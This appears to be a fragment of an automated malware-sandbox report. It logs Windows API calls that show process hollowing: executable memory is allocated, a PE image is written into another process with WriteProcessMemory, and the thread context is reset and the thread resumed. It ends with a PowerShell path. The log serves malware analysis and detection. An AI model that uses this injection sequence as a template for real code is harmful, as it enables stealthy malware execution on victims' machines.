protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000384
1 0 0

WriteProcessMemory

 buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL³­édà Z ê &è @à#@hд€@«J W0¤ ˜Ó  • ÀlÖP.textŠX Z  `.rdata‹p Œ^ @@.dataØ@ ê@À.00cfgPö@@.tls `ø@À.voltbl’pú.rsrc@«€¬ü@@.reloc¤ 0¢¨@B
base_address: 0x00400000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00401000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x004c7000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

 buffer: dpLæLÿÿÿÿÿÿÿÿÿÿÿÿNl±¿DNæ@»u˜DPDPÀàDÿÿÿÿàKMtˆM,‹MĈM|‹M‰M̋MX‰MŒMœ‰MTŒMà‰M˜ŒM$ŠM܌M¬ŠMdMhŠM MD…M äOØP ÙOäP ½OðPÈOüP «OP¶OP¤O P ÏOÿÿÿÿ<±M ÿÿÿÿÿÿÿÿÿÿÿÿ€  abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ8¬MPPPPPPP¸®M8°M©MÐP°PC   8¬M:±M¤P´?P´?P´?P´?P´?P´?P´?P´?P´?P¨P¸?P¸?P¸?P¸?P¸?P¸?P¸?PPP..þÿÿÿ “PSTPDTPSTPDTÈ P PH PÈ Pÿÿÿÿÿÿÿÿþÿÿÿè¤M.?AVbad_exception@std@@è¤M.?AVexception@std@@è¤M.?AVtype_info@@
base_address: 0x00500000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

 buffer: VëI
base_address: 0x00505000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00506000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

 buffer:   ^[^è£ÛÞ!&079< #7:RT <?@Cwy¯² \^…‡™›ËÍIK´á!$  ), %);>MPqtÆÉ8;FI "14;>UX§ª=@WZ©¬69 "'
base_address: 0x00507000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00508000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00563000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2680
process_handle: 0x00000384
1 1 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4843558
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000035c
process_identifier: 2680
1 0 0

NtResumeThread

 thread_handle: 0x0000035c
suspend_count: 1
process_identifier: 2680
1 0 0

NtResumeThread

 thread_handle: 0x000003d0
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

 thread_handle: 0x000001b0
suspend_count: 1
process_identifier: 2680
1 0 0
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe